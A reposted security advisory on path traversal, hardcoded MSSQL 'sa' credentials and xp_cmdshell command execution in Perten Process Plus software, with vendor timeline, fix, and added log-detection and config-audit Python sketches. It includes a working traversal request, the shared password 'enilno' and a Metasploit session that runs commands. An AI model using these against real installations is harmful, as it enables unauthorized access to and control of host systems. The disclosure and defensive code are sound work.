
Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials

23 Jul 2024 00:00:00 | Reported by T. Weber, S. Dietz, cyberdanube.com | Type: packetstorm | Source: packetstormsecurity.com | 345 Views


`CyberDanube Security Research 20240722-0  
-------------------------------------------------------------------------------  
title| Multiple Vulnerabilities  
product| Perten Instruments Process Plus Software  
vulnerable version| <=1.11.6507.0  
fixed version| 2.0.0  
CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913  
impact| High  
homepage| https://perkinelmer.com  
found| 2024-04-24  
by| S. Dietz, T. Weber (Office Vienna)  
| CyberDanube Security Research  
| Vienna | St. Pölten  
|  
| https://www.cyberdanube.com  
-------------------------------------------------------------------------------  
  
Vendor description  
-------------------------------------------------------------------------------  
"For 85 years, PerkinElmer has pushed the boundaries of science from food to  
health to the environment. We’ve always pursued science with a clear purpose –  
to help our customers achieve theirs. Our expert team brings technology and  
intangibles, like creativity, empathy, diligence, and a spirit of  
collaboration, in equal measure, to fulfill our customers’ desire to work  
better, innovate better, and create better.  
  
PerkinElmer is a leading, global provider of technology and service solutions  
that help customers measure, quantify, detect, and report in ways that help  
ensure the quality, safety, and satisfaction of their products."  
  
Source: https://www.perkinelmer.com/  
  
Vulnerable versions  
-------------------------------------------------------------------------------  
ProcessPlus Software / <=1.11.6507.0  
  
Vulnerability overview  
-------------------------------------------------------------------------------  
1) Unauthenticated Local File Inclusion (CVE-2024-6911)  
An LFI was identified in the web interface of the device. An attacker can use  
this vulnerability to read system-wide files and configuration.  
  
2) Hardcoded MSSQL Credentials (CVE-2024-6912)  
The software is using the same MSSQL credentials across multiple installations.  
In combination with 3), this allows an attacker to fully compromise the host.  
  
3) Execution with Unnecessary Privileges (CVE-2024-6913)  
The software uses the user "sa" to connect to the database. Access to this  
account allows an attacker to execute commands via the "xp_cmdshell" procedure.  
  
  
Proof of Concept  
-------------------------------------------------------------------------------  
1) Unauthenticated Local File Inclusion (CVE-2024-6911)  
The LFI can be triggered by using the following GET Request:  
-------------------------------------------------------------------------------  
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1  
Host: 192.168.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Upgrade-Insecure-Requests: 1  
-------------------------------------------------------------------------------  
This example returns the content from "C:\Windows\System32\drivers\etc\hosts"  
of an affected installation.  
  
2) Hardcoded MSSQL Credentials (CVE-2024-6912)  
Analysis across multiple installations shows that the configuration file  
"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:  
-------------------------------------------------------------------------------  
[...]  
<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;  
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"  
appid="Perten.OPCDA.Server" loglevel="info"  
logfile="C:\Perten\ProcessPlus\Log\opcserver.log">  
[...]  
-------------------------------------------------------------------------------  
These credentials "sa:enilno" were re-used in all reviewed installations.  
  
3) Execution with Unnecessary Privileges (CVE-2024-6913)  
The application uses the "sa" user to authenticate with the database. By using  
Metasploit, an attacker can execute arbitrary commands:  
-------------------------------------------------------------------------------  
msf6 auxiliary(admin/mssql/mssql_exec) > show options  
  
Module options (auxiliary/admin/mssql/mssql_exec):  
  
Name Current Setting  
---- ---------------  
CMD dir  
PASSWORD enilno  
RHOSTS 192.168.0.1  
RPORT 1433  
TDSENCRYPTION false  
TECHNIQUE xp_cmdshell  
USERNAME sa  
USE_WINDOWS_AUTHENT false  
  
msf6 auxiliary(admin/mssql/mssql_exec) > run  
[*] Running module against 192.168.0.1  
  
[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'  
  
[...]  
Directory of C:\Windows\system32  
01/23/2024 13:37 AM <DIR> .  
01/23/2024 13:37 AM <DIR> ..  
01/23/2024 13:37 AM <DIR> 0123  
01/23/2024 13:37 AM <DIR> 0123  
01/23/2024 13:37 AM 232 @AppHelpToast.png  
01/23/2024 13:37 AM 308 @AudioToastIcon.png  
[...]  
  
  
Solution  
-------------------------------------------------------------------------------  
Update to version 2.0.0.  
  
Workaround  
-------------------------------------------------------------------------------  
Restrict network access to the host with the installed software. Change the  
default credentials of the database in the config file and the database itself.  
  
  
Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends that Perten customers upgrade the software to the latest  
version available and restrict network access to the management interface.  
  
  
Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-29: Contacting PerkinElmer via [email protected].  
2024-05-13: Vendor asked for unencrypted advisory.  
2024-05-16: Sent advisory to vendor.  
2024-05-22: Asked for status update. No answer.  
2024-05-28: Asked for status update. Contact stated that they are working on a  
fix.  
2024-06-10: Asked for status update. Contact stated that all issues should be  
fixed by end of month. Local file inclusion should be fixed in  
version 1.16. Asked for a release date of version 1.16. No answer.  
2024-07-13: Asked for status update.  
2024-07-15: Contact stated that all three issues have been fixed in version  
2.0.0, which was released on 2024-07-11.  
2024-07-16: Asked for a link to the firmware update release.  
2024-07-17: Set release date to 2024-07-22.  
2024-07-22: Coordinated release of security advisory.  
  
  
Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com  
  
EOF S. Dietz, T. Weber / @2024  
  
`
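
A detection sketch for item 1, added here and not part of the CyberDanube advisory: it scans web access logs for requests to the download endpoint from the proof of concept whose file-name parameters carry path separators, drive prefixes or percent-encoded forms of them. The combined log format, the sample lines and the rule that a legitimate value is a bare file name are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint and parameter names come from the advisory's proof-of-concept request.
DOWNLOAD_PATH = "/processplus/log/download"
FILE_PARAMS = {"filename", "filenamewithserialnumber"}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, rounds=3):
    """Percent-decode a few rounds so double-encoded separators are normalized."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def is_suspicious_name(value):
    """Assumption: a legitimate value is a bare file name (no separator or drive)."""
    name = fully_decode(value).replace("\\", "/")
    return "/" in name or ":" in name or name in (".", "..")


def find_lfi_attempts(log_lines):
    """Return (line_number, parameter, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if url.path.rstrip("/").lower() != DOWNLOAD_PATH:
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() in FILE_PARAMS and is_suspicious_name(value):
                hits.append((number, key, fully_decode(value)))
    return hits


# Constructed access-log lines (combined log format), not from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jul/2024:10:00:01 +0000] "GET /ProcessPlus/Log/Download/?filename=_Errors_2102162.log&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1" 200 512',
    r'10.0.0.9 - - [22/Jul/2024:10:00:07 +0000] "GET /ProcessPlus/Log/Download/?filename=..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1" 200 824',
    '10.0.0.9 - - [22/Jul/2024:10:00:09 +0000] "GET /processplus/log/download?filename=..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824',
    '10.0.0.9 - - [22/Jul/2024:10:00:12 +0000] "GET /ProcessPlus/Log/Download/?filename=..%252F..%252FWindows%252Fwin.ini HTTP/1.1" 404 0',
    '10.0.0.7 - - [22/Jul/2024:10:00:15 +0000] "GET /other/page?filename=..%5Cx HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    print(find_lfi_attempts(SAMPLE_LOG))
```

On IIS, the same check applies to the `cs-uri-stem` and `cs-uri-query` fields once they are joined with `?` into a single request target.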
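
An audit sketch for items 2 and 3 and for the workaround, added here and not part of the CyberDanube advisory: it parses the `dbconnectstring` attribute of `OPCDA_SERVER.xml` and reports whether the installation still uses the published shared password or connects as "sa". The `<Config>` root element, the non-default passwords and the `processplus_app` login are hypothetical; the advisory does not say whether the product supports a non-"sa" login.

```python
import re
import xml.etree.ElementTree as ET

# Values published in the advisory for CVE-2024-6912 and CVE-2024-6913.
SHARED_PASSWORD = "enilno"
PRIVILEGED_LOGIN = "sa"
PAIR_RE = re.compile(r"\s*([^=;]+?)\s*=\s*(\{[^}]*\}|[^;]*)")


def parse_odbc_string(conn):
    """Split an ODBC connection string into a dict with lower-cased keys."""
    return {k.lower(): v.strip().strip("{}") for k, v in PAIR_RE.findall(conn)}


def audit_opcda_config(xml_text):
    """Return (cve, message) findings for each OPCDA_Server element."""
    findings = []
    for node in ET.fromstring(xml_text).iter("OPCDA_Server"):
        fields = parse_odbc_string(node.get("dbconnectstring", ""))
        if fields.get("uid", "").lower() == PRIVILEGED_LOGIN:
            findings.append(("CVE-2024-6913", "application connects as 'sa'"))
        if fields.get("pwd") == SHARED_PASSWORD:
            findings.append(("CVE-2024-6912", "password shared across installations"))
    return findings


# Constructed config modelled on the advisory's excerpt; the <Config> root,
# the non-default passwords and the 'processplus_app' login are hypothetical.
TEMPLATE = r'''<Config>
  <OPCDA_Server dbconnectstring="Driver={{SQL Server}};SERVER=.\PertenSQL;
    DATABASE=ProcessPlus_OPC;UID={uid};PWD={pwd}" application_id="1"
    appid="Perten.OPCDA.Server" loglevel="info"
    logfile="C:\Perten\ProcessPlus\Log\opcserver.log"/>
</Config>'''
AS_SHIPPED = TEMPLATE.format(uid="sa", pwd="enilno")
PASSWORD_CHANGED = TEMPLATE.format(uid="sa", pwd="constructed-unique-value-1")
LOW_PRIVILEGE = TEMPLATE.format(uid="processplus_app", pwd="constructed-unique-value-2")

if __name__ == "__main__":
    for label, cfg in [("as shipped", AS_SHIPPED), ("password changed", PASSWORD_CHANGED),
                       ("low-privilege login", LOW_PRIVILEGE)]:
        print(label, audit_opcda_config(cfg))
```

A changed password clears only the CVE-2024-6912 finding; the "sa" finding stays until the application no longer connects with that account.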

Published: 23 Jul 2024 00:00
Vulners AI Score: 7 (High risk)
CVSS 3.1: 9.8
CVSS 4: 9.3
EPSS: 0.93322